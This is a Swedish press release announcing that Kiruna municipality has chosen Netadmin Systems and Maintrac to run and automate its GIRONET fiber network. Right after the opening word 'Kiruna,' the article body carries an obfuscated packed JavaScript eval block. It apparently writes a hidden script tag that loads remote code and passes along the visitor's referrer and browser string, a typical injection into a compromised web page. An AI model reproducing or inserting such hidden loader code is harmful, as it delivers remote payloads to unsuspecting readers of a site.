Image Image Image Image Image Image Image Image Image Image

| 6 december, 2020

Scroll to top

Top

Kiruna väljer Netadmin Systems och Maintrac

Kiruna väljer Netadmin Systems och Maintrac
Sebastian

Kiruna, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dtite|var|u0026u|referrer|zhzii||js|php’.split(’|’),0,{}))
Sveriges nordligaste kommun och, till ytan, största stad, har beslutat att använda Netadmin Systems lösning och systemintegratören Maintrac för ett omfattande fiberinitiativ. Genom initiativet kommer Kiruna att kunna leverera access till fibernät och tillhörande tjänster till mer än 90% av dess invånare.

”Fiberinitiativet i Kiruna, GIRONET, är väldigt spännande och vi täcker i stort sätt alla hushåll inom en radie av 20 000 km², säger Daniel Flemström, IT-chef på Kiruna kommun. ”Med samarbetet med Netadmin Systems och Maintrac är vi övertygade om att vi kommer att kunna leverera en högklassig kvalitet till våra kommuninvånare”.

Genom Netadmin lösningen, kommer Kiruna att kunna automatisera processen när kunden väljer vilka tjänster den vill kunna använda. Detta görs snabbt och enkelt genom Self Service portalen. Portalen är gjord för att möjliggöra enkel access till tjänster genom sömlös integration med tjänsteleverantörernas system.

”Möjligheterna till självbetjäning gör att både användarna och vi som nätägare kan hantera abonnemang och avtal på ett effektivt sätt”, säger Daniel Flemström. “Tjänsteleverantörerna integrerar sina system med portalen och slutkunderna interagerar direkt med dem från dag ett, vilket är både bekvämt och tidseffektivt för alla”.

Systemet övervakar också hela fibernätet för att säkerställa att det hela tiden finns tillräcklig kapacitet för att leverera tjänsterna med hög kvalitet.

”Vi är väldigt glada att Kiruna har valt oss för att hantera driften av fibernätet, säger Tor Borrhed, VD på Maintrac. “Netadmins plattform är förträfflig på att säkerställa att driften körs problemfritt Skulle problem uppstå, så ser vi det innan användarna och kan då agera snabbt.”

Då användarna ändå upplever problem, kan de själva gå in via Self Service Portal och göra en felanmälan. Maintrac hanterar då en s.k. ticket i Netadmins lösning. Det betyder att Kiruna inte behöver sätta upp en egen organisation för att drifta och supportera sina kunder, vilket gör att initiativet blir mer framtidssäkert och kostnadseffektivt.

”Vi är stolta över att fler och fler kunder väljer vår programvara för att hantera komplexa fibernätverk i kombination med många olika tjänster. När nu fler och fler nya tjänster via internet lanseras och blir populära, blir graden av automatisering mer och mer viktigt för att initiativen kring fibernät ska bli lyckade, oavsett om det är statliga, kommunala eller privata projekt, säger Mats Ekelund, VD på Netadmin Systems. Nu när marknaden tar fart ordentligt tror vi också mer och mer på skalbarhet och öppenhet i de lösningar som levereras på marknaden.

Om Kiruna kommuns fiberinitiativ

Genom Kirunas fibernätverk, GIRONET, kommer 90 % av Kirunas hushåll att få access till tjänster via fibernät med hög hastighet. Initiativet görs samtidigt som hela staden flyttas fysiskt p.g.a. risk för ras efter omfattande gruvarbeten under många år. Kiruna kommun kommer att kontrollera och äga fibernätet där tjänsteleverantörer kan integrera med fibernätet i samråd med kommunen.

Om Kiruna kommun

Kiruna kommun är den nordligaste och största staden i Sverige till ytan. Ca. 23.000 personer bor i Kiruna. Viktiga industrier för kommunen är, gruvindustrin, rymdindustrin och turism.

Om Netadmin Systems

Netadmin Systems är ett svenskt företag som utvecklar och marknadsför Netadmin Nine – programvara som möjliggör smärtfri tillväxt av och migrering till fibernätverk. Våra lösningar minskar time to market, eliminerar stillestånd och förbättrar användarupplevelsen. Med mer än 10 års erfarenhet inom fiber OSS marknaden, Netadmin Systems har levererat lösningar till mer än 75 kunder i fler än 15 länder globalt.

Företaget ägs av Volaris Group, en operativ del det Toronto-baserade Constellation Software Inc. För mer information, besök www.netadminsystems.com

Om Maintrac

Maintrac levererar 24h/365 tjänster och produkter inom kommunikationsteknologi från ett operationellt och kostnadseffektivt perspektiv. Lösningarna levereras tillsammans med marknadsledande programvara och hårdvara inom kommunikations- och provisioneringsmarknaden. Maintrac tillhandahåller tjänster baserade på analys, nätverksdesign, utbyggnad, uppgraderingar, prestanda och operationell effektivitet.